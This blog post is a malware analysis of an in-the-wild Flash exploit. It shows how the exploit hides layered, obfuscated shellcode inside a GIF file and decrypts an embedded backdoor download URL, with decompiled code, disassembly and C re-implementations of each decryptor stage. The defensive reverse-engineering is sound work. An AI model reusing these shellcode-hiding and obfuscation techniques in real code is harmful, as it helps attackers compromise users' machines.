As explained in the referenced links, the exploit found in the wild works by:
- Having a victim's browser load a Flash file (cc.swf) that exploited the vulnerable Flash player
- The exploit (shellcode) then downloads a GIF file (logo.gif) from the web server hosting the SWF file
- This GIF file contains encrypted/encoded shellcode embedded within it that eventually downloads a backdoor executable from an encrypted URL within the file. Static decryption of this URL is what my friend was after
Unfortunately, many of the previous research writeups were not available at the time of my friend's request. To assist with Flash decompilation, I used SoThink SWF decompiler, which is a tool I cannot recommend enough, and that I have used to successfully analyze numerous Flash files. Since my effort, Zscaler has published a nice writeup on the Flash file and how it constructs its payload, although it misses a key part to writing the decoder -- how to determine where the encrypted shellcode starts within the downloaded GIF file.
Through analysis with SoThink's tool I was able to determine that the last four bytes of the GIF file contained a little endian integer that represented the offset of the encrypted payload from the beginning of where the offset is stored (the end of the file minus 4). The following decompiled function shows this process. The decompilation is from SoThink and the comments are mine:
1 public class cc extends Sprite
2 {
3 [snip]
4 _loc_4 = new URLLoader();
5 _loc_4.dataFormat = "binary";
6 _loc_4.addEventListener("complete", Ƿ); // sets mpsc
7 _loc_4.load(new URLRequest("logo.gif")); // get logo.gif from same server as loaded
8 [snip]
9 }
10
11 public function Ƿ(event:Event) : void
12 {
13 var _loc_3:* = new ByteArray();
14
15 /* writes logo.gif to loc_3 */
16 _loc_3.writeBytes(event.target.data as ByteArray, 0, (event.target.data as ByteArray).length);
17
18 /* move to last 4 bytes */
19 _loc_3.position = _loc_3.length - 4;
20 _loc_3.endian = "littleEndian";
21
22 /* last four bytes of logo.gif */
23 var _loc_4:* = _loc_3.readUnsignedInt();
24 var _loc_2:* = new ByteArray();
25
26 /* length of file - integer from last 4 bytes - 4 */
27 _loc_2.writeBytes(_loc_3, _loc_3.length - 4 - _loc_4, _loc_4);
28 _loc_2.position = 0;
29
30 /* integer read from offset: length of file - integer from last 4 bytes - 4 */
31 Ǵ.setSharedProperty("mpsc", _loc_2);
32 Ǵ.start();
33
34 return;
35 }// end function
As can be seen on lines 4-7, which are inside the constructor of the Flash file, the logo.gif file is downloaded. The URLLoader instance used to download the file has its complete listener set to the function shown on lines 11 through 35. This function is triggered once the file is finished downloading. On line 16 the file's contents are read into an array named _loc_3 (the third declared local variable) by the decompiler. On lines 19 and 20 the array's position is moved to four bytes before the end of the file and its disposition is set to little endian. On line 23 the integer at these last four bytes is read and a new byte array, _loc_2 is declared. Line 27 is the key one as _loc_2 is filled with the bytes of _loc_3 (logo.gif) starting at the end of the file minus the integer read minus another four bytes. At this point _loc_2 holds the encrypted shellcode and is stored in the mpsc shared property. This buffer will later be executed by the exploit payload.
Now that I knew how to find the shellcode reliably, I then needed to decrypt the shellcode in order to find the instructions that located and decrypted the embedded backdoor URL. When analyzing the shellcode I was working in a native Linux environment so I used a mix of vim, dd, and ndisasm. To start, I figured out the offset of the encrypted shellcode within my file and then extracted a copy of the shellcode.
The following lists the beginning of the shellcode:
1 $ ndisasm -b32 stage1
2 00000000 D9EE fldz
3 00000002 D97424F4 fnstenv [esp-0xc]
4 00000006 5E pop esi
5 00000007 83C61F add esi,byte +0x1f
6 0000000A 33C9 xor ecx,ecx
7 0000000C 66B90009 mov cx,0x900
8 00000010 8A06 mov al,[esi]
9 00000012 8A6601 mov ah,[esi+0x1]
10 00000015 8826 mov [esi],ah
11 00000017 884601 mov [esi+0x1],al
12 0000001A 83C602 add esi,byte +0x2
13 0000001D E2F1 loop 0x10
14 0000001F EE out dx,al
15 00000020 D974D9F4 fnstenv [ecx+ebx*8-0xc]
16 00000024 2483 and al,0x83
[snip]
For those of you who have never used ndisasm before, it is the disassembler that comes with the nasm assembler. The b option defines the architecture (16, 32, or 64 bit Intel), and ndisasm simply treats the file as raw instructions. This makes it very useful when analyzing shellcode. In the output the first column is the offset of the instruction from the beginning of the file, the second column is the instruction's opcodes, and the third column is the instruction's mnemonic.
As you can see in the ndisasm output, the instructions make sense until line 14 (offset 0x1f) where the out instruction is used. out is used to talk directly with hardware devices, and as such is a privileged operation. Since this shellcode runs in userland, out cannot be used and even the operating system's kernel mode components use it sparingly. Examination of the instructions on lines 2 through 13 reveal a decryptor loop that targets the instructions starting at line 14. To begin, lines 2-4 leverage the floating point unit to determine the runtime address of where the fldz (offset 0) instruction is memory. The floating point internals that enable this are explained in an Symantec paper here and the shellcode trick was first disclosed by noir in 2003 here.
Lines 5-7 then setup the loop. First 0x1f is added to the esi register which moves it to the offset where the out instruction is. ecx is then set to zero using xor and the value 0x900 is moved into the cx (the bottom half of ecx) register. This is the loop counter, so we know that the first layer of decryption will operate on 0x900 (2304) bytes. Lines 8 through 12 then implement the deobfuscation of the bytes beginning at offset 14 with an algorithm that translates to:
1 void stage1(unsigned char *buf)
2 {
3 unsigned char *esi;
4 int ecx;
5 unsigned char ah, al;
6
7 // add esi,byte +0x1f
8 esi = buf + 0x1f;
9
10 // xor ecx,ecx
11 // mov cx,0x900
12 ecx = 0x900;
13
14 while(ecx > 0)
15 {
16 // mov al,[esi]
17 al = *esi;
18
19 // mov ah,[esi+0x1]
20 ah = *(esi + 1);
21
22 // mov [esi],ah
23 *esi = ah;
24
25 // mov [esi+0x1],al
26 *(esi + 1) = al;
27
28 // add esi,byte +0x2
29 esi = esi + 2;
30
31 // loop 0x10
32 ecx = ecx - 1;
33 }
34 }
As you can see from the converted assembly, the purpose of this loop is to flip each byte with the one preceding it in the obfuscated shellcode. This is done by using the ah and al registers which are 1 byte in size each. After running the decoder above, the instructions starting at our original out instruction (offset 0x1f) now make sense and become the second stage of shellcode decryption:
1 $ ndisasm -b32 stage2
2 00000000 D9EE fldz
3 00000002 D97424F4 fnstenv [esp-0xc]
4 00000006 5E pop esi
5 00000007 83C621 add esi,byte +0x21
6 0000000A 56 push esi
7 0000000B 5F pop edi
8 0000000C 33C9 xor ecx,ecx
9 0000000E 66B9F008 mov cx,0x8f0
10 00000012 90 nop
11 00000013 66AD lodsw
12 00000015 662D6161 sub ax,0x6161
13 00000019 C0E004 shl al,0x4
14 0000001C 02C4 add al,ah
15 0000001E AA stosb
16 0000001F E2F2 loop 0x13
17 00000021 6E outsb
18 00000022 6A6F push byte +0x6f
19 00000024 6F outsd
[snip]
As can be seen, this decryptor stage is another loop that transforms the code that follows it. Lines 2-4 contain code necessary to place esi at the fldz instruction of the second stage decryptor. Line 5 then adds 0x21 to esi in order to point it to the junk outsb instruction at line 17. The loop counter is initialized to 0x8f0 at line 9 and then lines 11 through 15 perform the transformation. This transformation can be expressed in C as:
1 void stage2(unsigned char *buf)
2 {
3 int ecx;
4 unsigned char *esi;
5 unsigned char *edi;
6 unsigned short ax;
7 unsigned char al, ah;
8
9 // add esi,byte +0x21
10 esi = buf + 0x21;
11
12 // push esi
13 // pop edi
14 edi = esi;
15
16 // xor ecx,ecx
17 // mov cx,0x8f0
18 ecx = 0x8f0;
19
20 while(ecx > 0)
21 {
22 // lodsw
23 ax = *(unsigned short *)esi;
24 esi = esi + 2;
25
26 // sub ax,0x6161
27 ax = ax - 0x6161;
28
29 ah = (ax >> 8) & 0xff;
30 al = ax & 0xff;
31
32 // shl al,0x4
33 al = al << 4;
34
35 // add al,ah
36 al = al + ah;
37
38 // stosb
39 *edi = al;
40 edi = edi + 1;
41
42 ecx = ecx - 1;
43 }
44 }
After the second stage of deobfuscation the outsb (line 17 from the previous ndisasm output) and its following instructions look like:
1 $ ndisasm -b32 stage3
2 00000000 D9EE fldz
3 00000002 D97424F4 fnstenv [esp-0xc]
4 00000006 5E pop esi
5 00000007 83C61F add esi,byte +0x1f
6 0000000A 33C9 xor ecx,ecx
7 0000000C 66B96804 mov cx,0x468
8 00000010 8A06 mov al,[esi]
9 00000012 8A6601 mov ah,[esi+0x1]
10 00000015 8826 mov [esi],ah
11 00000017 884601 mov [esi+0x1],al
12 0000001A 83C602 add esi,byte +0x2
13 0000001D E2F1 loop 0x10
14 0000001F EE out dx,al
15 00000020 D974D9F4 fnstenv [ecx+ebx*8-0xc]
16 00000024 2483 and al,0x83
[snip]
You may notice that this is the same algorithm used in stage 1 for decryption, just with a different loop counter since the decrypting process is moving further down the file. By running the algorithm starting at line 14 (offset 0x1f) we get the fourth level of decryptor shellcode:
1 $ ndisasm -b32 stage4
2 00000000 D9EE fldz
3 00000002 D97424F4 fnstenv [esp-0xc]
4 00000006 5E pop esi
5 00000007 83C616 add esi,byte +0x16
6 0000000A 33C9 xor ecx,ecx
7 0000000C 66B9BB08 mov cx,0x8bb
8 00000010 803631 xor byte [esi],0x31
9 00000013 46 inc esi
10 00000014 E2FA loop 0x10
[snip]
This decryptor loop decrypts the next 0x8bb bytes using the following algorithm:
1 void stage4(unsigned char *buf)
2 {
3 int ecx;
4 unsigned char *esi;
5
6 // add esi,byte +0x16
7 esi = buf + 0x16;
8
9 // add esi,byte +0x16
10 // mov cx,0x8bb
11 ecx = 0x8bb;
12
13 while (ecx > 0)
14 {
15 // xor byte [esi],0x31
16 *esi = *esi ^ 0x31;
17
18 // inc esi
19 esi = esi + 1;
20
21 // loop 0x10
22 ecx = ecx - 1;
23 }
24 }
After running this algorithm, we finally get to the fully deobfuscated shellcode and can begin analysis:
1 $ ndisasm -b32 stage5
2 00000000 55 push ebp
3 00000001 8BEC mov ebp,esp
4 00000003 81EC90010000 sub esp,0x190
5 00000009 53 push ebx
6 0000000A 56 push esi
7 0000000B 57 push edi
[snip]
Remember that the original purpose of my friend's request was a decoder that could decrypt the encrypted URL used to download the backdoor file. The first relevant instruction that I found related to this task is at offset 0x90 in the deobfuscated function:
1 00000090 E800000000 call dword 0x95
2 00000095 5B pop ebx
3 00000096 83C350 add ebx,byte +0x50
4 00000099 899D74FEFFFF mov [ebp-0x18c],ebx
5 0000009F 8B8574FEFFFF mov eax,[ebp-0x18c]
6 000000A5 813831123112 cmp dword [eax],0x12311231
7 000000AB 740F jz 0xbc
8 000000AD 8B8574FEFFFF mov eax,[ebp-0x18c]
9 000000B3 40 inc eax
10 000000B4 898574FEFFFF mov [ebp-0x18c],eax
11 000000BA EBE3 jmp short 0x9f
[snip]
On line 1 we see a call instruction being made to the next instruction (pop ebx). This has the effect of placing the runtime address of the pop ebx instruction into ebx. 0x50 is then added to this address and a loop begins that is searching for 0x12311231 (0x31123112 on disk due to little endian) towards the end of the GIF file. This is the special marker used to denote where the encrypted URL begins. Once this marker is found, control is transferred to offset 0xbc (this check and jmp occurs on lines 6-7).
Starting at offset 0xbc, we have the following loop. Note that this disassembly is annoyingly long due to no optimizations being used.
1 000000BC 8B8574FEFFFF mov eax,[ebp-0x18c]
2 000000C2 83C004 add eax,byte +0x4
3 000000C5 898574FEFFFF mov [ebp-0x18c],eax
4 000000CB 8B8574FEFFFF mov eax,[ebp-0x18c]
5 000000D1 898580FEFFFF mov [ebp-0x180],eax
6 000000D7 83A588FEFFFF00 and dword [ebp-0x178],byte +0x0
7 000000DE 8B8574FEFFFF mov eax,[ebp-0x18c]
8 000000E4 038588FEFFFF add eax,[ebp-0x178]
9 000000EA 0FBE00 movsx eax,byte [eax]
10 000000ED 83F8FF cmp eax,byte -0x1
11 000000F0 744F jz 0x141
12 000000F2 8B8574FEFFFF mov eax,[ebp-0x18c]
13 000000F8 038588FEFFFF add eax,[ebp-0x178]
14 000000FE 0FBE00 movsx eax,byte [eax]
15 00000101 83F012 xor eax,byte +0x12
16 00000104 8B8D74FEFFFF mov ecx,[ebp-0x18c]
17 0000010A 038D88FEFFFF add ecx,[ebp-0x178]
18 00000110 8801 mov [ecx],al
19 00000112 8B8574FEFFFF mov eax,[ebp-0x18c]
20 00000118 038588FEFFFF add eax,[ebp-0x178]
21 0000011E 0FBE00 movsx eax,byte [eax]
22 00000121 83E831 sub eax,byte +0x31
23 00000124 8B8D74FEFFFF mov ecx,[ebp-0x18c]
24 0000012A 038D88FEFFFF add ecx,[ebp-0x178]
25 00000130 8801 mov [ecx],al
26 00000132 8B8588FEFFFF mov eax,[ebp-0x178]
27 00000138 40 inc eax
28 00000139 898588FEFFFF mov [ebp-0x178],eax
29 0000013F EB9D jmp short 0xde
On lines 1-3 the pointer to where the marker was found is incremented by 4 to skip the marker and then placed into [ebp-0x18c]. This value is then also placed into [ebp-0x180] on line 5. The buffer holding the URL is then enumerated until an 0xff marker is found. This is accomplished by the byte comparison of -0x1 on line 10 and the bailout if found on line 11. Lines 12 through 29 perform the decryption of the URL. The main part of this decryption is on lines 15 and 22 (shown in red) where each byte is transformed by XOR'ing with 0x12 and then subtracting 0x31.
After this analysis, we now finally know how to find and decrypt the URL:
- Read in logo.gif
- Search the file for 0x31123112 in little endian
- Once found, decrypt each byte by XOR it with 0x12 and subtract 0x31
- Stop processing when a byte of 0xff is found
$ python decode.py logo.gif
Found \x31\x12\x31\x12 marker at offset 17764
Found 0xff, breaking URL processing loop
Download URL: http://redacted/redacted.exe
I hope that you found reading this blog post informative and interesting. I would like to thank the other members of the Volatility Team (@iMHLv2, @gleeda, @4tphi) for proof reading this before I hit 'Publish' and for @justdionysus providing the historical references related to the use of the FPU for finding EIP. If you have any questions or comments on the post please leave a comment below, ping me on Twitter (@attrc), or shoot me an email (andrew @@@ memoryanalysis.net).
Excellent, excellent write up. I appreciate the granular details.
ReplyDelete